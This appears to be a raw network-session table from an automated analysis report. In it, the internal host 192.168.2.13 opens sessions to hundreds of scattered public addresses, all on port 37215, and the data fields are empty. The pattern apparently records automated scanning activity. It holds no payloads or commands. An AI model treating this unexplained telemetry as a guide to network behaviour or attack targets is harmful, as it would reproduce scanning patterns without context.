                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17943192.168.2.134666025.246.150.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17944192.168.2.134638491.66.152.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17945192.168.2.1348440197.100.30.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17946192.168.2.134522481.2.53.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17947192.168.2.1337326197.229.48.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17948192.168.2.1337276197.36.125.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17949192.168.2.1341806197.202.245.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17950192.168.2.1339808197.160.75.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17951192.168.2.1356958197.138.232.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17952192.168.2.13329369.77.178.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17953192.168.2.1336336175.220.17.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17954192.168.2.1352520107.171.190.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17955192.168.2.1335130197.231.232.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17956192.168.2.135209634.80.207.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17957192.168.2.1347138197.130.148.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17958192.168.2.1337296197.180.90.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17959192.168.2.1341808157.248.138.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17960192.168.2.1348856197.238.63.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17961192.168.2.134044854.62.4.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17962192.168.2.134556041.129.201.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17963192.168.2.134354441.247.225.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17964192.168.2.134180241.8.184.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17965192.168.2.1352112197.73.233.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17966192.168.2.134569441.214.90.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17967192.168.2.134287841.183.74.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17968192.168.2.1335486197.39.131.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17969192.168.2.1355096197.209.233.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17970192.168.2.1356720197.245.246.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17971192.168.2.134818441.193.23.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17972192.168.2.133959018.18.201.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17973192.168.2.135445857.20.117.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17974192.168.2.1359724157.28.236.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17975192.168.2.134620841.138.204.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17976192.168.2.1337032131.229.123.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17977192.168.2.1356898197.244.252.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17978192.168.2.135610041.0.41.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17979192.168.2.1355374197.229.249.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17980192.168.2.1344164157.15.33.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17981192.168.2.1353084197.208.115.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17982192.168.2.1346044197.143.4.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17983192.168.2.1353928157.22.3.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17984192.168.2.1336208157.181.193.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17985192.168.2.135096241.92.153.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17986192.168.2.1345190207.198.43.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17987192.168.2.135083041.213.171.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17988192.168.2.1355110157.22.50.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17989192.168.2.135146641.138.14.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17990192.168.2.1346580195.183.109.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17991192.168.2.1342770188.116.94.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17992192.168.2.1337674196.253.213.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17993192.168.2.135965441.145.192.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17994192.168.2.133703640.4.254.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17995192.168.2.1352010171.170.2.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17996192.168.2.134661075.193.17.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17997192.168.2.1341636197.153.150.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17998192.168.2.133804441.149.146.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17999192.168.2.1333908162.232.225.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18000192.168.2.1345858157.179.205.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18001192.168.2.135704241.247.138.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18002192.168.2.1354562197.139.147.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18003192.168.2.1357786197.60.61.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18004192.168.2.133751841.190.223.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18005192.168.2.1357022197.201.121.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18006192.168.2.1358162157.227.17.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18007192.168.2.135795641.93.114.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18008192.168.2.1333836197.150.3.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18009192.168.2.1335096189.207.39.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18010192.168.2.1353076197.185.171.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18011192.168.2.1343518128.255.12.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18012192.168.2.1352700197.177.75.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18013192.168.2.135581841.46.117.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18014192.168.2.1356282157.184.198.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18015192.168.2.1341774157.232.154.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18016192.168.2.1356538157.72.117.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18017192.168.2.1340924200.53.1.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18018192.168.2.133376041.25.54.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18019192.168.2.135825864.7.53.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18020192.168.2.1334900157.26.222.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18021192.168.2.1351452131.206.235.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18022192.168.2.1349150197.213.52.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18023192.168.2.1351316150.122.163.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18024192.168.2.1359514125.76.33.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18025192.168.2.134881241.95.240.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18026192.168.2.1346102116.241.212.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18027192.168.2.135071441.41.1.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18028192.168.2.1354234197.164.243.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18029192.168.2.1358850122.51.176.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18030192.168.2.1339818202.163.194.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18031192.168.2.134500238.57.101.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18032192.168.2.133909657.200.145.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18033192.168.2.135926884.54.65.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18034192.168.2.1341810157.0.78.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18035192.168.2.1352270197.253.135.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18036192.168.2.133617641.64.40.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18037192.168.2.1334570157.203.35.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18038192.168.2.1341168197.34.85.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18039192.168.2.134998241.58.127.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18040192.168.2.135109241.152.197.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18041192.168.2.1339382197.199.12.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18042192.168.2.1334836157.32.115.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18043192.168.2.134792241.109.93.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18044192.168.2.1349430197.122.16.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18045192.168.2.1342040157.62.203.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18046192.168.2.1335546159.9.230.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18047192.168.2.1352812157.64.145.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18048192.168.2.1336936197.154.141.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18049192.168.2.1353592145.22.109.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18050192.168.2.134240441.241.242.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18051192.168.2.1359844197.250.122.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18052192.168.2.1348470202.144.56.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18053192.168.2.1360500157.89.58.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18054192.168.2.1354682175.144.222.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18055192.168.2.1347324157.203.169.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18056192.168.2.1353254189.167.243.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18057192.168.2.1342454157.7.215.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18058192.168.2.1340548197.183.188.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18059192.168.2.1360112197.165.211.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18060192.168.2.135294254.76.216.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18061192.168.2.1333222157.211.73.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18062192.168.2.1338766135.39.62.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18063192.168.2.135520041.16.53.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18064192.168.2.135572841.217.76.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18065192.168.2.1342112197.130.63.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18066192.168.2.134562841.205.9.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18067192.168.2.1349504157.3.54.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18068192.168.2.1339160197.97.63.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18069192.168.2.1333320157.88.13.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18070192.168.2.1344832216.229.246.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18071192.168.2.1343248197.50.170.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18072192.168.2.1352192157.213.56.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18073192.168.2.134364041.165.75.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18074192.168.2.1338488101.226.56.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18075192.168.2.1339842157.98.33.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18076192.168.2.1346636157.16.234.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18077192.168.2.134059241.107.149.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18078192.168.2.1342124197.133.9.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18079192.168.2.134168241.1.40.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18080192.168.2.135316241.148.5.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18081192.168.2.1336572157.37.85.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18082192.168.2.134464441.228.113.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18083192.168.2.1358308148.185.50.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18084192.168.2.135096089.177.114.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18085192.168.2.1344514197.108.240.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18086192.168.2.135899441.48.144.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18087192.168.2.134157841.204.8.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18088192.168.2.135671296.58.150.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18089192.168.2.1348582217.3.170.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18090192.168.2.133438641.28.87.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18091192.168.2.1347422197.192.188.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18092192.168.2.135258841.186.43.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18093192.168.2.1332882157.99.241.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18094192.168.2.135869241.131.251.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18095192.168.2.1347442157.37.106.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18096192.168.2.1352440197.135.128.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18097192.168.2.133552041.109.26.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18098192.168.2.1343958185.50.47.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18099192.168.2.1341860172.49.129.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18100192.168.2.135072041.76.6.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18101192.168.2.133422841.243.108.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18102192.168.2.134783241.85.21.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18103192.168.2.1350028157.159.34.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18104192.168.2.1341680157.149.208.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18105192.168.2.133864441.89.41.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18106192.168.2.133522298.199.137.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18107192.168.2.1348494197.150.25.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18108192.168.2.1342860197.34.64.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18109192.168.2.135802441.158.82.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18110192.168.2.1346860157.133.78.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18111192.168.2.134680641.202.38.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18112192.168.2.1352010157.165.157.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18113192.168.2.1339642197.19.217.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18114192.168.2.1351254192.30.254.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18115192.168.2.1339928201.127.173.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18116192.168.2.1358740197.1.81.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18117192.168.2.134066465.127.35.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18118192.168.2.1339130157.132.57.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18119192.168.2.1345834197.133.196.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18120192.168.2.135126241.33.86.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18121192.168.2.135158061.219.97.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18122192.168.2.136067841.172.8.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18123192.168.2.134035441.63.168.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18124192.168.2.134849641.76.186.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18125192.168.2.133362041.203.30.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18126192.168.2.134763474.96.62.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18127192.168.2.134529841.132.109.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18128192.168.2.134229041.216.246.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18129192.168.2.1358530186.176.8.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18130192.168.2.1351330157.92.10.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18131192.168.2.13479349.59.193.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18132192.168.2.134271441.119.125.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18133192.168.2.1343090157.29.159.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18134192.168.2.1340906157.167.49.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18135192.168.2.1348200157.160.26.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18136192.168.2.1351652197.116.164.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18137192.168.2.1336796172.202.177.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18138192.168.2.133815476.5.156.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18139192.168.2.1338056197.250.4.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18140192.168.2.1352754148.242.37.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18141192.168.2.1349146197.203.190.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18142192.168.2.136025441.211.127.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18143192.168.2.1356082157.192.250.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18144192.168.2.1347324220.55.4.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18145192.168.2.1358170111.31.186.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18146192.168.2.1342936157.135.209.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18147192.168.2.1351588157.29.84.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18148192.168.2.1353440197.10.202.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18149192.168.2.134020441.245.58.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18150192.168.2.1359770197.217.6.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18151192.168.2.135928041.73.140.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
